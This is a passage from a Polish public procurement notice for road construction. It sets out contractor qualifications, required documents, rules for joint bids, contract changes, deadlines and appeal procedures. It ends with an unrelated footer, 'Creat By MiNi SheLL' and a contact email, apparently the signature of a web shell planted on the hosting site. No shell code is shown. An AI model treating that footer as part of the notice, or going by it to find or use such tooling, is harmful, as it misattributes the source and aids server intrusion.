zrealizował lub realizuje (przy czym w tym przypadku<br/>będzie liczona wartość zrealizowanej części przedmiotu umowy) co najmniej 1 robotę budowlaną (przez robotę budowlaną rozumie się wykonywanie prac na podstawie 1 umowy)<br/>polegającą na wykonywaniu prac z zakresu budowy, przebudowy dróg, na kwotę nie mniejszą<br/>niż 200.000,00 zł brutto b) Warunek ten, w zakresie potencjału technicznego, zostanie uznany za<br/>spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponować: co najmniej 1 szt co<br/>najmniej 1 szt. równiarki samojezdnej, co najmniej 1 szt. walca wibracyjnego, stalowego do<br/>zagęszczania o wadze min. 10 ton, co najmniej 1 szt. koparko-ładowarki, co najmniej 1 szt.<br/>koparki jednonaczyniowej, kołowej,<br/>co najmniej 1 szt. samochodu samowyładowczego, co najmniej 1 szt. agregowanego recyklera<br/>ze stabilizatorem gruntu, co najmniej 1 szt. walca ogumionego, co najmniej 1 szt. piaskarki<br/>samochodowej,<br/>co najmniej 1 szt. pługo – odśnieżarki samochodowej. c) Warunek ten, w zakresie osób<br/>skierowanych przez wykonawcę do realizacji zamówienia, zostanie uznany za spełniony, jeśli<br/>Wykonawca wykaże, że dysponuje lub będzie dysponować: - co najmniej 1 osobą kierownikiem<br/>budowy - z uprawnieniami budowlanymi do kierowania robotami budowlanymi w specjalności<br/>budowlanej drogowej bez ograniczeń, z aktualnymi uprawnieniami zawodowymi wydanymi na<br/>podstawie ustawy Prawo Budowlane i Rozporządzenia Ministra Infrastruktury i Rozwoju z dnia<br/>11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U.<br/>2014, poz. 1278) lub inne odpowiednie wydane na podstawie wcześniej obowiązujących<br/>przepisów lub odpowiadające im uprawnienia budowlane, które zostały wydane obywatelom<br/>państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z<br/>zastrzeżeniem art. 12a oraz innych przepisów ustawy z dnia 7 lipca 1994r. Prawo Budowlane (t.<br/>jedn. Dz. U. z 2021, poz. 11 z późn. zm.) oraz ustawy z dnia 22 grudnia 2015 r. o zasadach<br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.<br/>U. z 2020 r., poz. 220 z późn. zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W zakresie spełniania warunków udziału w postępowaniu:a) Informację<br/>banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych<br/>środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc<br/>przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu,b)<br/>wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie (wzór wykazu<br/>wykonanych robót budowlanych stanowi załącznik nr 9 do SWZ),Jeżeli Wykonawca powołuje się na<br/>doświadczenie w realizacji robót budowlanych, wykonanych wspólnie z innymi wykonawcami<br/>informacje, o których mowa wyżej dotyczą robót budowlanych faktycznie przez niego wykonanych, a w<br/>przypadku świadczeń powtarzających się lub ciągłych - również faktycznie przez niego wykonywanych.<br/>c) dowody, że wskazane przez Wykonawcę roboty budowlane na potwierdzenie spełnienia warunku<br/>udziału w postępowaniu dot. zdolności technicznej lub zawodowej w zakresie doświadczenia zostały<br/>wykonane lub są wykonywane należycie, Dowodami, o których mowa powyżej są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli<br/>z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych<br/>dokumentów – oświadczenie Wykonawcy. d) wykaz osób, skierowanych przez wykonawcę do realizacji<br/>zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie robót budowlanych, wraz<br/>z informacjami na temat ich doświadczenia i wykształcenia niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania (wzór wykazu osób skierowanych przez wykonawcę do realizacji zamówienia stanowi<br/>załącznik nr 8 do SWZ).e) informację z Krajowego Rejestru Karnego w zakresie:(a) art. 108 ust. 1 pkt 1<br/>i 2 PZP,(b) art. 108 ust. 1 pkt 4 PZP, odnośnie do orzeczenia zakazu ubiegania się o zamówienie<br/>publiczne tytułem środka karnego,f) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o<br/>braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o<br/>ochronie konkurencji i konsumentów (tekst jedn. Dz. U. z 2021 r., poz. 275 z późn. zm.), z innym<br/>Wykonawcą, który złożył odrębną ofertę lub ofertę częściową, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie<br/>oferty lub oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy<br/>kapitałowej - (wzór oświadczenia Wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o przynależności lub braku przynależności do tej grupy kapitałowej stanowi załącznik nr 3 do SWZ),g) odpis lub informacje z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W zakresie niepodlegania wykluczeniu:a)oświadczenia wykonawcy o<br/>aktualności informacji zawartych<br/>w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP w zakresie podstaw wykluczenia z<br/>postępowania określonych w: a) art. 108 ust. 1 pkt 3 PZP, b) art. 108 ust. 1 pkt 4 PZP odnośnie do<br/>orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, c) art. 108 ust. 1 pkt 5 PZP odnośnie do zawarcia z innymi wykonawcami porozumienia mającego na celu<br/>zakłócenie konkurencji, d) art. 109 ust.1 pkt. 4 i 7 (wzór oświadczenia Wykonawcy o aktualności<br/>informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP w zakresie podstaw<br/>wykluczenia z postępowania stanowi załącznik nr 3a do SWZ)</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych,wykonawca,<br/>który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument<br/>pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia<br/>oferty i podpisania umowy. 2.wypełniony i podpisany Kosztorys ofertowy sporządzony metodą<br/>uproszczoną. Niezałączenie lub załączenie niepodpisanego Kosztorysu ofertowego<br/>sporządzonego metodą uproszczoną skutkować będzie również odrzuceniem oferty z<br/>postępowania. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia: w<br/>formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia;oferta musi być podpisana w taki sposób, by wiązała prawnie<br/>wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Osoba<br/>podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Gdy umocowanie osoby<br/>składającej ofertę nie wynika z dokumentów rejestrowych, wykonawca, który składa ofertę za<br/>pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa<br/>obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania<br/>umowy. W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia<br/>wykonawcy zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści<br/>którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie<br/>zamówienia tych wykonawców należy załączyć do oferty. Pełnomocnictwo powinno być załączone do oferty i powinno zawierać w szczególności wskazanie:postępowania o zamówienie<br/>publiczne, którego dotyczy;wszystkich wykonawców ubiegających się wspólnie o udzielenie<br/>zamówienia wymienionych z nazwy z określeniem adresu siedziby;ustanowionego pełnomocnika<br/>oraz zakresu jego umocowania.Pełnomocnictwo przekazuje się w postaci elektronicznej i<br/>opatruje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym.W przypadku gdy zostały sporządzone jako dokument w postaci papierowej i<br/>opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu<br/>opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym, poświadczające zgodność cyfrowego odwzorowania z dokumentem w postaci<br/>papierowej. Przez cyfrowe odwzorowanie, rozumieć dokument elektroniczny będący kopią<br/>elektroniczną treści zapisanej w postaci papierowej, umożliwiający zapoznanie się z tą treścią i<br/>jej zrozumienie, bez konieczności bezpośredniego dostępu do oryginału.Poświadczenia<br/>zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej dokonuje odpowiednio<br/>wykonawca, wykonawca wspólnie ubiegający się o udzielenie zamówienia, podmiot<br/>udostępniający zasoby lub podwykonawca, w zakresie dokumentów potwierdzających<br/>umocowanie do reprezentowania, które każdego z nich dotyczą lub notariusz.Oświadczenie o<br/>którym mowa w art.125 ust.1 ustawy Pzp potwierdzające brak podstaw wykluczenia oraz<br/>spełnienie warunków udziału w postępowaniu składa każdy z wykonawców wspólnie<br/>ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu. Oświadczenie wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia składane na formularzu stanowiącym zał. nr 2 do<br/>SWZ powinno zostać złożone wraz z ofertą pod rygorem nieważności, w formie<br/>elektronicznej.dokumenty, o których mowa w pkt 8.1. oraz 8.2 lit. d-f zobowiązany będzie złożyć<br/>każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia. wszyscy Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za<br/>wykonanie umowy. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą<br/>spośród siebie Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań,<br/>otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów.<br/>Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości<br/>przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>łącznie lub każdego z osobna. Mając na uwadze przepis art. 117 ust. 4 ustawy Pzp, wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego<br/>wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy w zakresie: terminu<br/>wykonania umowy, pod warunkiem, że zaszły okoliczności, których nie można było przewidzieć<br/>w chwili zawarcia umowy, a w szczególności gdy realizowane są roboty dodatkowe,<br/>przedłużenia terminu wykonania zamówienia; wszelkich zmian umowy, o ile konieczność ich<br/>wprowadzenia będzie wynikała ze zmian w obowiązujących przepisach prawaZmiana<br/>wynagrodzenia wynikająca z obmiaru robót obejmujące również roboty zamienne, zaniechane i<br/>dodatkowe wykonane zgodnie z postanowieniami umowy.Żadna zmiana nie może odnosić się<br/>do zdarzeń uprzednio dokonanych, a skuteczność zmiany nie ma mocy wstecznej.W przypadku<br/>W przypadku konieczności wprowadzenia zmian do umowy Strona zainteresowana przekazuje drugiej Stronie wniosek na piśmie. Wykonawca zobowiązany będzie do przekazania<br/>Zamawiającemu wniosku dotyczącego zmiany Umowy wraz z opisem zdarzenia lub okoliczności<br/>stanowiących podstawę do żądania takiej zmiany. W dniu złożenia wniosku Wykonawca<br/>zobowiązany jest powiadomić o tym fakcie Inspektora Nadzoru.Wniosek, o którym mowa<br/>powyżej powinien zostać przekazany niezwłocznie, jednakże nie później niż w terminie 7 dni<br/>roboczych od dnia, w którym Wykonawca dowiedział się, lub powinien dowiedzieć się o danym<br/>zdarzeniu lub okolicznościach. Wykonawca zobowiązany jest do dostarczenia wraz z wnioskiem<br/>wszelkich innych dokumentów wymaganych Umową i informacji uzasadniających żądanie<br/>zmiany Umowy, stosowanie do zdarzenia lub okoliczności stanowiących podstawę żądania<br/>zmiany, w tym propozycji rozliczenia.Jeśli w trakcie realizacji umowy nastąpi zmiana stawki<br/>podatku VAT wykonawca wystawia fakturę zgodnie z obowiązującymi przepisami na dzień<br/>wystawienia faktury (wynagrodzenie netto plus obowiązujący podatek VAT).W przypadku<br/>wystąpienia którejkolwiek z okoliczności wymienionych w pkt. 5 termin wykonania umowy może<br/>ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej<br/>przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.<br/>Wszystkie powyższe postanowienia stanowią katalog zmian na które Zamawiający może<br/>wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-13 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem platformy eZamawiający - https://zamowienia.pila.lasy.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-13 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-10</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.Wykonawcy, a także innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia<br/>oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów<br/>PZP, przysługują środki ochrony prawnej określone w dziale IX PZP tj. odwołanie i skarga do<br/>sądu. Postępowanie odwoławcze uregulowane zostało w przepisach art. 506-578 PZP, a<br/>postępowanie skargowe w przepisach art.. 579-590 PZP.2.Odwołanie przysługuje na:1)<br/>niezgodną z przepisami PZP czynność Zamawiającego, podjętą w postępowaniu o udzielenie<br/>zamówienia, w tym na projektowane postanowienie umowy;2) zaniechanie czynności w<br/>postępowaniu o udzielenie zamówienia, do której Zamawiający był obowiązany na podstawie<br/>PZP;3) zaniechanie przeprowadzenia postępowania o udzielenie zamówienia, mimo że<br/>Zamawiający był do tego obowiązany.3. Odwołanie wnosi się do Prezesa Krajowej Izby<br/>Odwoławczej. Odwołujący przekazuje kopię odwołania Zamawiającemu przed upływem terminu<br/>do wniesienia odwołania w taki sposób, aby mógł on zapoznać się z jego treścią przed upływem<br/>tego terminu. Domniemywa się, że Zamawiający mógł zapoznać się z treścią odwołania przed<br/>upływem terminu do jego wniesienia, jeżeli przekazanie jego kopii nastąpiło przed upływem<br/>terminu do jego wniesienia przy użyciu środków komunikacji elektronicznej.4. Odwołanie wnosi<br/>się w terminie: (a) 5 dni od dnia przekazania informacji o czynności Zamawiającego stanowiącej<br/>podstawę jego wniesienia, jeżeli informacja została przekazana przy użyciu środków komunikacji elektronicznej, (b) 10 dni od dnia przekazania informacji o czynności<br/>Zamawiającego stanowiącej podstawę jego wniesienia, jeżeli informacja została przekazana w<br/>sposób inny niż określony w lit. (a).5. Odwołanie wobec treści ogłoszenia wszczynającego<br/>postępowanie o udzielenie zamówienia lub wobec treści dokumentów zamówienia wnosi się w<br/>terminie 5 dni od dnia zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych lub<br/>dokumentów zamówienia na stronie internetowej 6. Odwołanie w przypadkach innych niż<br/>określone w pkt 17.4. i 17.5 SWZ wnosi się w terminie 5 dni od dnia, w którym powzięto lub przy<br/>zachowaniu należytej staranności można było powziąć wiadomość o okolicznościach<br/>stanowiących podstawę jego wniesienia. 7. Na orzeczenie Krajowej Izby Odwoławczej oraz<br/>postanowienie Prezesa Krajowej Izby Odwoławczej, o którym mowa w art. 519 ust. 1 PZP,<br/>stronom oraz uczestnikom postępowania przysługuje skarga do sądu. Skargę wnosi się do Sądu<br/>Okręgowego w Warszawie - sądu zamówień publicznych. Skargę wnosi się za pośrednictwem<br/>Prezesa Krajowej Izby Odwoławczej, w terminie 14 dni od dnia doręczenia orzeczenia Krajowej<br/>Izby Odwoławczej lub postanowienia Prezesa Krajowej Izby Odwoławczej, o którym mowa w art.<br/>519 ust. 1 PZP, przesyłając jednocześnie jej odpis przeciwnikowi skargi. Złożenie skargi w<br/>placówce pocztowej operatora wyznaczonego w rozumieniu ustawy z dnia 23 listopada 2012 r. -<br/>Prawo pocztowe (tekst jedn. Dz. U. z 2020 r., poz. 1041 z późn. zm.).

Creat By MiNi SheLL
Email: jattceo@gmail.com